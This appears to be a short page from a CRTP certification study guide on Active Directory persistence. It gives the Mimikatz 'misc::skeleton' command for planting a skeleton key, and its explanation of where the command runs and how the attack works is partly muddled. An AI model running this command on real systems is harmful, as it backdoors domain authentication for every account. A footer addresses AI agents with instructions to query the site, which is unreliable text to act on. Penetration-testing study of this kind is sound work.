# Skeleton Keys

### **Create the skeleton key - Requires DA**

```
Invoke-MimiKatz -Command '"privilege::debug" "misc::skeleton"' -Computername <target>
```

To create a skeleton key on a target computer that allows access to any account on that system without requiring a password change, you would need to have Domain Admin (DA) privileges. The Mimikatz command to execute this action is as follows:

```powershell
Invoke-MimiKatz -Command '"privilege::debug" "misc::skeleton"' -Computername <target>
```

Replace `<target>` with the hostname or IP address of the computer, you wish to create a skeleton key for.&#x20;

This command must be run with administrative rights, hence the requirement for DA privileges.

### Sources

{% embed url="<https://pentestlab.blog/2018/04/10/skeleton-key/>" %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://crtp-certification.certs-study.com/domain-persistence/skeleton-keys.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.